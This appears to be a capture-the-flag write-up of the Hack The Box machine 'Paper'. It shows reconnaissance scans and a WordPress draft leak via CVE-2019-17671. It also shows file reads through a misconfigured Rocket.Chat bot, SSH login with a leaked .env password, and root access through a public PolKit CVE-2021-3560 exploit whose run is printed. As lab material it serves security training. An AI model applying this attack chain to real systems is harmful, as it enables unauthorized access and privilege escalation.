$ nmap -sV -sC -PN -oA paper_nmap -p- 10.10.11.143
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-10 08:47 CEST
Nmap scan report for 10.10.11.143
Host is up (0.071s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
| 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| http-methods:
|_ Potentially risky methods: TRACE
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after: 2022-07-08T10:32:34
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| tls-alpn:
|_ http/1.1
| http-methods:
|_ Potentially risky methods: TRACE
No common UDP-based services were found.
The web server on ports 80 and 443 appears to be a generic server test page with no content:
Fuzzed for additional subdirectories and found a manual directory containing a local copy of the Apache manual:
There isn't much to go on in the manual subdirectory, as it appears to be an standard copy of the official documentation.
Attempted to run a vulnerability scan with nikto and found a backend server:
$ nikto -h paper.htb -o output.txt
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.11.143
+ Target Hostname: paper.htb
+ Target Port: 80
+ Start Time: 2025-07-10 09:21:02 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Uncommon header 'x-backend-server' found, with contents: office.paper.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /OA81iZS5.php: Retrieved x-powered-by header: PHP/7.2.24.
+ mod_fcgid/2.3.9 appears to be outdated (current is at least 2.3.10-dev).
+ OpenSSL/1.1.1k appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ Apache/2.4.37 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: OPTIONS, HEAD, GET, POST, TRACE .
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /manual/: Web server manual found.
+ /icons/: Directory indexing found.
+ /manual/images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8769 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2025-07-10 09:25:18 (GMT2) (256 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
The x-backend-server header points to a different backend server than the main one. The backend server can be accessed by pointing the target IP address to the DNS name of the backend server (office.paper).
Navigated to office.paper and found the backend server site:
The backend server is running a WordPress blog. There is a hint about a secret draft in a comment on one the blog posts:
Searched for generator in the page source and found that the site is running WordPress 5.2.3:
This version of WordPress is vulnerable to leaking hidden content without authentication (CVE-2019-17671). The vulnerability can be triggered by appending a ?static=1 to WordPress index.php page. Doing so reveals Prisonmike's hidden draft:
test
Micheal please remove the secret from drafts for gods sake!
Hello employees of Blunder Tiffin,
Due to the orders from higher officials, every employee who were added to this blog is removed and they are migrated to our new chat system.
So, I kindly request you all to take your discussions from the public blog to a more private chat system.
-Nick
Warning for Michael
Michael, you have to stop putting secrets in the drafts. It is a huge security issue and you have to stop doing it. -Nick
Threat Level Midnight
A MOTION PICTURE SCREENPLAY,
WRITTEN AND DIRECTED BY
MICHAEL SCOTT
[INT:DAY]
Inside the FBI, Agent Michael Scarn sits with his feet up on his desk. His robotic butler Dwigt….
Secret Registration URL of new Employee chat system
I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick.
Also, stop looking at my drafts. Jeez!
The URL in the post points to the registration page for a Rocket.Chat instance.
Exploitation
Registered an account and accessed the company chat server. There is a single channel available, #general. According to the exisiting conversation, there is a bot available that can be used to read local files:
Although #general is set to read-only mode, recyclops can be interacted with by messaging it directly:
The bot is essentially a wrapper for OS commands and will list the contents of any path without restriction:
Looked around inside user dwight's home directory and found the configuration file for the chat bot in ~/hubot/.env:
Used the password in the .env file to connect to the target over SSH as user dwight.
Got the user flag.
Privilege Escalation
User dwight has no sudo privileges, nor are they are member of any privileged group. There doesn't seem to be any custom binaries or useful directories where dwight has write access.
There is one additional user account on the target, rocketchat, which sounds like a service account for Rocket.Chat. However, this is also a regular non-privileged account. The account does have full access to the Rocket.Chat program directory (/opt/Rocket.Chat), but it's unlikely to be helpful for gaining privilege escalation.
With no obvious privilege escalation routes to go after, a good next step is to run LinPeas:
[dwight@paper ~]$ ./linpeas.sh
...
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
...
Vulnerable to CVE-2021-3560
...
The vulnerability suggested by LinPeas (CVE-2021-3560) is a privilege escalation vulnerability in PolKit. Exploiting the vulnerability requires precise timing for sending two requests to PolKit within a short period of time. As this is a relatively old vulnerability, there are plenty of PoCs available that automate the process, such as this one.
Downloaded the PoC script from the above GitHub and ran it:
[dwight@paper ~]$ ./poc.sh
[!] Username set as : secnigma
[!] No Custom Timing specified.
[!] Timing will be detected Automatically
[!] Force flag not set.
[!] Vulnerability checking is ENABLED!
[!] Starting Vulnerability Checks...
[!] Checking distribution...
[!] Detected Linux distribution as "centos"
[!] Checking if Accountsservice and Gnome-Control-Center is installed
[+] Accounts service and Gnome-Control-Center Installation Found!!
[!] Checking if polkit version is vulnerable
[+] Polkit version appears to be vulnerable!!
[!] Starting exploit...
[!] Inserting Username secnigma...
Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required
[+] Inserted Username secnigma with UID 1005!
[!] Inserting password hash...
[!] It looks like the password insertion was succesful!
[!] Try to login as the injected user using su - secnigma
[!] When prompted for password, enter your password
[!] If the username is inserted, but the login fails; try running the exploit again.
[!] If the login was succesful,simply enter 'sudo bash' and drop into a root shell!
[dwight@paper ~]$ su - secnigma
Password:
[secnigma@paper ~]$ id
uid=1005(secnigma) gid=1005(secnigma) groups=1005(secnigma),10(wheel)
[secnigma@paper ~]$ sudo bash
[sudo] password for secnigma:
[root@paper secnigma]# id
uid=0(root) gid=0(root) groups=0(root)
